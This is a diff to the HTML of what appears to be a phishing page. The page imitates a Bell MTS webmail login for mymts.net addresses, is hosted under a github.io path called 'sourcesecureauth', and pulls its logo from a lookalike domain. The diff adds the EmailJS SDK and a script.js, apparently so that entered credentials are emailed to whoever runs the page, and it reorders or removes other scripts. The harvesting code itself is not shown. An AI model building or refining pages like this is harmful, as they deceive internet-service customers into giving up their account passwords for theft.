--- a/index.html
+++ b/index.html
@@ -8,13 +8,15 @@
     <link href="styles.css" rel="stylesheet" />
     <link href="https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css" rel="stylesheet" />
     <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
+    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script> <!-- EmailJS SDK -->
+    <script src="script.js" defer></script> <!-- Link to external JavaScript -->
 </head>
 <body>
     <div class="wrapper">
         <form id="form" name="sentMessage" novalidate="novalidate">
             <input name="__original_url" type="hidden" value="https://sourcesecureauth.github.io/newlogin/"/>
             <div class="logo">
-                <img src="https://download.logo.wine/logo/Bell_Internet/Bell_Internet-Logo.wine.png" />
+                <img src="https://cableco.auth-gateway.net/images/mts/bellmts.png" alt="MTS Logo" />
                 <p>Log in with your mymts.net email address</p>
             </div>
             <div class="container">
@@ -32,21 +34,6 @@
             </div>
         </form>
     </div>
-    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
-    <script src="email.js"></script>
-    <script>
-        const passwordInput = document.getElementById("pw");
-        const toggleButton = document.getElementById("togglePassword");
-        toggleButton.addEventListener("click", function () {
-            if (passwordInput.type === "password") {
-                passwordInput.type = "text";
-                toggleButton.textContent = "Hide";
-            } else {
-                passwordInput.type = "password";
-                toggleButton.textContent = "Show";
-            }
-        });
-    </script>
-    <script src="email.js"></script>
+    <script src="script.js"></script> <!-- Ensure script.js is included after the form -->
 </body>
 </html>
